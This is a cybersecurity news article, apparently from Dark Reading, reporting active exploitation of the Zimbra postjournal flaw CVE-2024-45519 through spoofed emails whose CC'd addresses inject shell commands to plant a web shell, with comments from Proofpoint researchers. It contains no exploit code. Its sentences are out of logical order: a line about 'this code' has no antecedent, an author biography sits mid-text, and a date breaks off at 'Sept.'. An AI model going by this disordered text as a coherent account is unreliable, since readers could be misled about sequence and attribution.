"Some emails from the same sender used a series of CC'd addresses attempting to build a Web shell on a vulnerable Zimbra server," Proofpoint said. Attackers are actively targeting a severe remote code execution vulnerability that Zimbra recently disclosed in its SMTP server, heightening the urgency for affected organizations to patch vulnerable instances right away. In a series of posts on X, the security vendor described the attackers as sending spoofed emails that look like they are from Gmail to vulnerable Zimbra servers. Last February, researchers at W Labs spotted North Korea's prolific Lazarus Group attempting to steal intelligence from organizations in the healthcare and energy sectors by targeted unpatched Zimbra servers. This technique could potentially allow attackers to execute unauthorized commands on affected Zimbra servers, Proofpoint said. Notably, the threat actor is using the same server for sending the exploit emails and hosting the second-stage payload, which suggests a relatively immature operation, says Greg Lesnewich, threat researcher at Proofpoint. The Web shell allows the attacker to remotely access the server via specially crafted HTTP requests and to modify files, access sensitive data, and execute other arbitrary commands. Last year, for instance, researchers found as many as four Chinese advanced persistent threat actors leveraging a Zimbra zero-day (CVE-2023-37580) to target government agencies worldwide. This code is crafted to trick Zimbra into running it as shell commands, rather than processing it as a regular email address. "It speaks to the fact that the actor does not have a distributed set of infrastructure to send exploit emails and handle infections after successful exploitation," Lesnewich says. Zimbra issued updates for affected versions last week but has not released any details of the flaw so far. It allows an unauthenticated remote attacker to execute arbitrary commands on a vulnerable system and take control of it. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Researchers at Proofpoint this week reported observing attacks targeting the flaw beginning on Sept. They identified the issue as stemming from a failure to properly sanitize user input, thereby enabling attackers to inject arbitrary commands. The bug gives attackers a way to run arbitrary code on affected servers and take control of them. The bug, identified as CVE-2024-45519, is present in the Zimbra postjournal service component for email journaling and archiving. The attackers can use it to download and run malicious code on a vulnerable system, Proofpoint said. Lesnewich says the volume of attacks has remained roughly the same since they began last week and appear to be more opportunistic in nature than targeted.
This Cyber News was published on www.darkreading.com. Publication date: Tue, 01 Oct 2024 21:45:11 +0000